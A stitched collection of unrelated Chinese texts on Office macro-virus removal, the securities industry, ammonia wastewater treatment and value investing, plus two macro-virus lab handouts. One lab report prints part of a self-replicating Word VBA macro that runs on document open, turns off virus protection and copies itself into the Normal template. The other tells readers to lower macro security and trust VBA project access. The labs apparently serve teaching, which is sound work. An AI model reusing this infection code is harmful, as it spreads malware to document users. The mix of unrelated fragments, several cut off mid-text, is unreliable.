以前，我的电脑也多次中过病毒。我一般的做法就是上网查找 资料，把几篇文章介绍的方法结合起来，多试几次，几乎都能解决。可是这一次，情况完全不同。上网查了多次，讲宏病毒的文章特别多，但是介绍杀除方法的极少，而专门针对Microsoft Excel 4.0 宏病毒的只有一两篇提问的贴子，所介绍的方法就两样，一是在Excel 2003中禁止宏，二是用杀毒软件。第一种禁止是不行的，第二种杀毒软件我用了小红伞、360安全卫士，没查出病毒。 除此之外，还有一种临时救急的方法是：打开病毒表格，复制，再新建一个表格，选择性粘贴，只选值，最后保存。这个办法虽然行，但是面对那么多有宏病毒的表格，一个一个打开、复制、选择 性粘贴是不现实的。怎么办呢？ 接下来，我的思路是选择一种不支持excel宏的电子表格软件，这 样也许就把宏病毒过滤了。我试验过的软件有：wps office 2003 到最新的2010版，Ashampoo Office 2010，OpenOffice 3.2，永中Office 2009。它们都提示发现了宏，有的说不支持，有的说可以禁用，重新保存后宏病毒仍然存在，要么再打开时软件死机。 但是试验中发现微软Office 2007 / 2010 Beta 可以打开表格，只是在菜单栏提示“禁止了宏”，不影响操作。然而，现在基层单 位的电脑配置都比较低，安装不了Office 2007 / 2010 Beta，再说Office 2007 / 2010 Beta的菜单怪怪的，很多人不习惯。最重要的是，这并没有从根本上解决问题，宏病毒依然在表格文件里。 有个单位的人对我说，他们请来了电脑公司人员，几个小青年，把

OFFICE宏病毒彻底清除方法

办公室OFFICE宏病毒彻底清除方法最近办公室OFFICE宏病毒泛滥了，整个文件服务器上到处都是宏病毒，搞的办公室大家的电脑上都中了宏病毒，很是苦恼。相信有很多同仁也深有同感！ 前期，杀毒软件360安全卫士、360杀毒、金山毒霸、宏病毒专杀都试了，百般无奈，自己查询了些资料，想出来一条好办法。 治病还是找根源，office宏病毒依赖于VBA插件，VBA百科：Visual Basic forApplications （VBA）是一种Visual Basic的一种宏语言，主要能用来扩展Windows 的应用程式功能，特别是Microsoft Office 软件。也可说是一种应用程式视觉化的Basic Scrip t 1994年发行的Excel 5.0版本中，即具备了VBA的宏功能。 所以我们在OFFCIE2OO安装文件中去掉VBA插件支持即可。 具体操作方法： 1 .打开开始——设置——控制面板，找到添加和删除程序，双击打开。 2.在添加和删除程序界面里，选择更改和删除程序，在程序目录中找到Microsoft office Professional Edition 2003 ,点击更改。 3?在弹出的OFFICE安装界面里，选择添加和删除功能，点击下一步。 4. 在复选框选择应用程序的高级自定义前面打勾。点击下一步。 5. 找到OFFICE共享功能。点+号展开详细子项。找到Visual Basic forApplications，点击前面▼，选择 X 不安装即可。 6. 点击更新，等待OFFICE S新完成，提示Microsoft office 2003已被成功的更新。点击确定就OK了。

中国证券行业分析报告

中国证券行业分析报告 【最新资料，WORD文档，可编辑修改】

目录 一、中国证券市场的发展概况 (3) 二、我国证券行业的监管 (4) 1、行业监管体制 (4) （1）中国证监会的集中统一监督管理 (4) 三、我国证券行业的基本情况 (7) 1、行业发展概况 (7) 2、进入本行业的主要障碍 (8) 3、行业竞争格局 (9) 4、行业利润水平的变动趋势及变动原因 (12) 四、影响中国证券业发展的主要因素 (13) 1、有利因素 (13) 2、不利因素 (16) 五、中国证券业的经营模式及周期性、地域性特征 (17) 1、中国证券业的经营模式 (17) 2、中国证券业的周期性特征 (17) 3、中国证券业的区域性特征 (17) 六、中国证券业的发展趋势 (18) 1、业务多元化 (18) 2、经营规范化、革新化 (20) 3、竞争白热化 (21) 七、投资建议 (21)

前言 证券市场的不断发展完善，行业持续发展前景看好。2013年证券市场基础制度和法制建设稳步推进，多层资本市场建设取得了重要进展，新三板市场推向全国，证券公司柜台市场平稳起步；证券监管部门进步一放松管制、加强监管，积极保护中小投资者的利益，为资本市场的良好运转提供保障；证券公司整体功能得到扩展，行业的创新和服务能力加强，尤其创新业务发展迅速，资产业务规模继续大幅增长。 互联网金融发展趋势，新制度促进传统业务转型。互联网金融起步，证券公司开始尝试搭建网络综合服务平台，通过网上开户、在线理财等信息技术手段扩展金融服务渠道。即将出台的取消″一人一户″行业政策，低佣金率、高服务质量的企业将会在新的竞争格局中略胜一筹。 国际化竞争加强，行业格局迎来新的调整。行业新一轮并购重组启动，国际化探索取得阶段性成果，随着行业市场不断国际化，外资公司不断加入，行业的竞争格局迎来新的调整良机。 迎合市场需求，发展互联网经纪业务，与大型互联网公司合作是证券公司发展的新方向。对券商板块基本运营而言，传统经纪业务的下行对应着互联网新兴经纪业务的蓬勃发展，互联网与经纪业务的侵蚀与融合将发展到一个更高的层次。 一、中国证券市场的发展概况 证券市场是金融市场的重要组成部分，在金融体系中居于重要地位。证券市场的三大

宏病毒实验报告

宏病毒实验报告 2 邹文敏 一、实验目的 通过运行计算机代码，更加深刻的理解计算机代码。对计算机代码有一个初步的认识。 加深对宏病毒的感性认识，宏病毒是感染数据文件word,office 等。 二、实验内容 运行自我复制，感染word公用模板和当前文档；具有一定破坏性的宏；清除宏病毒。 三、实验步骤 实验一： 将word文档中的开发者工具打开；word 中心→信任选项→宏设计将信任选项打开

运行第一个实验Visual Basic →normal →Microsoft→the document Project→microsoft word对象→the document复制如下代码：'APMP Private Sub Document_Open() On Error Resume Next Application.DisplayStatusBar = False Options.VirusProtection = False Options.SaveNormalPrompt = False '以上都是基本的自我隐藏措施 MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines( 1, 20) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then _ Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule

高浓度氨氮废水处理方法与工艺

高浓度氨氮废水处理 废水处理, 高浓度废水处理, 高浓度 过量氨氮排入水体将导致水体富营养化，降低水体观赏价值，并且被氧化生成的硝酸盐和亚硝酸盐还会影响水生生物甚至人类的健康。因此，废水脱氮处理受到人们的广泛关注。目前，主要的脱氮方法有生物硝化反硝化、折点加氯、气提吹脱和离子交换法等。消化污泥脱水液、垃圾渗滤液、催化剂生产厂废水、肉类加工废水和合成氨化工废水等含有极高浓度的氨氮（500 mg/L以上，甚至达到几千mg/L），以上方法会由于游离氨氮的生物抑制作用或者成本等原因而使其应用受到限制。高浓度氨氮废水的处理方法可以分为物化法、生化联合法和新型生物脱氮法。 1 物化法 1.1 吹脱法 在碱性条件下，利用氨氮的气相浓度和液相浓度之间的气液平衡关系进行分离的一种方法。一般认为吹脱效率与温度、pH、气液比有关。 王文斌等[1]对吹脱法去除垃圾渗滤液中的氨氮进行了研究，控制吹脱效率高低的关键因素是温度、气液比和pH。在水温大于25 ℃,气液比控制在3500左右，渗滤液pH控制在10.5左右，对于氨氮浓度高达2000～4000 mg/L的垃圾渗滤液，去除率可达到90%以上。吹脱法在低温时氨氮去除效率不高。

王有乐等[2]采用超声波吹脱技术对化肥厂高浓度氨氮废水（例如882 mg/L）进行了处理试验。最佳工艺条件为pH＝11，超声吹脱时间为40 min，气水比为l000：1试验结果表明，废水采用超声波辐射以后，氨氮的吹脱效果明显增加，与传统吹脱技术相比，氨氮的去除率增加了17％～164％，在90％以上，吹脱后氨氮在100 mg/L 以内。 为了以较低的代价将pH调节至碱性，需要向废水中投加一定量的氢氧化钙，但容易生水垢。同时，为了防止吹脱出的氨氮造成二次污染，需要在吹脱塔后设置氨氮吸收装置。 Izzet等[3]在处理经UASB预处理的垃圾渗滤液（2240 mg/L）时发现在pH＝11.5，反应时间为24 h，仅以120 r/min的速度梯度进行机械搅拌，氨氮去除率便可达95％。而在pH＝12时通过曝气脱氨氮，在第17小时pH开始下降，氨氮去除率仅为85％。据此认为，吹脱法脱氮的主要机理应该是机械搅拌而不是空气扩散搅拌。 1.2 沸石脱氨法 利用沸石中的阳离子与废水中的NH4+进行交换以达到脱氮的目的。沸石一般被用于处理低浓度含氨废水或含微量重金属的废水。然而，蒋建国等[4]探讨了沸石吸附法去除垃圾渗滤液中氨氮的效果及可行性。小试研究结果表明，每克沸石具有吸附15.5 mg氨氮的极限潜力，当沸石粒径为30～16目时，氨氮去除率达到了78.5%，且在吸附时间、投加量及沸石粒径相同的情况下，进水氨氮浓度越大，吸附速率越大，沸石作为吸附剂去除渗滤液中的氨氮是可行的。

价值投资策略在中国证券市场的有效性分析.

全国中文核心期刊· 财会月刊□2010.4下旬·21 ·□【摘要】在世界金融危机全面蔓延的背景下,中国证券市场的泡沫逐渐破灭,许多散户和机构投资者损失惨重。随着市场的理性回归,人们的投资理念也开始发生转变,股票的内在价值受到越来越高的重视。本文以深证300指数股为样本,对2006~2008年观察期内上市公司主要财务指标与股票价格之间相关性和影响程度进行分析,研究价值投资在中国证券市场的有效性。 【关键词】价值投资股票价格市场有效性王竞 (中南财经政法大学新华金融保险学院武汉430074 价值投资策略在中国证券市场的有效性分析 目前,国内外涉及价值投资的研究主要集中在以下三个领域:市场有效性的研究、股票内在价值的决定及评估和价值投资的实证研究。由于中国证券市场的建设远远落后于美国等发达国家,因此我国学者大多数是借用国外理论模型对国内股票市场进行价值投资的适用性分析。虽然研究很多,但结论却不能达成一致,对于中国股票市场的价值投资意义存在与否有较大分歧。如王孝德和彭艳(2003的《价值投资策略:国际经验与中国实证》一文中,采用Fama 和French 的投资组合方式对中国股市进行检验,认为价值投资策略获得的超额收益率不能由市场风险因素解释,中国股票市场现有的数据尚不足以验证投资者对价值股的增长率预期是否正确。但也有学者认为中国股票市场正在逐步完善的过程中,价值投资的功能渐渐明朗。 本文从价值投资策略的基本概念入手,借助对上市公司财务指标的分析,通过具体数据解答中国股票市场是否存在价值投资的问题。 一、实证分析 1.理论基础。目前在中国股票市场中,普遍认为影响股票内在价值的因素有三个:基本面因素、技术面因素和题材面因素。其中,基本面因素主要包含国内外经济形

word宏恶意代码实验

计算机宏病毒分析 一、实验目的 ?了解“宏病毒”机理； ?掌握清除宏病毒的方法； ?掌握采用“宏”和脚本语言进行编程的技术。 二、实验环境 ?Windows 7 64位旗舰版 ?Office Word2010字处理软件。 三、实验要求 ?宏的编写； ?理解宏病毒的作用机制。 四、实验步骤： 1．软件设置 关闭杀毒软件；打开Word字处理软件，在工具“宏”的“安全性”中，将“安全级”设置为低，在“可靠发行商”选项卡中，选择信任任何所有安装的加载项和模板，选择“信任visual basic项目的访问”。 注意：为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过多的word文档，否则清除比较麻烦（对每个打开过的文档都要清除）。 2．自我复制功能演示 打开一个word文档，然后按Alt+F11调用宏编写窗口（工具“宏”“Visual Basic宏编辑器”）,在左侧的“project—>Microsoft Word”对象“ThisDocument”中输入以下代码（Macro-1），保存，此时当前word文档就含有宏病毒，只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word 文档的公共模板）和当前文档的ThisDocument中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open），此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。 完整代码如下： 'Macro-1：Micro-Virus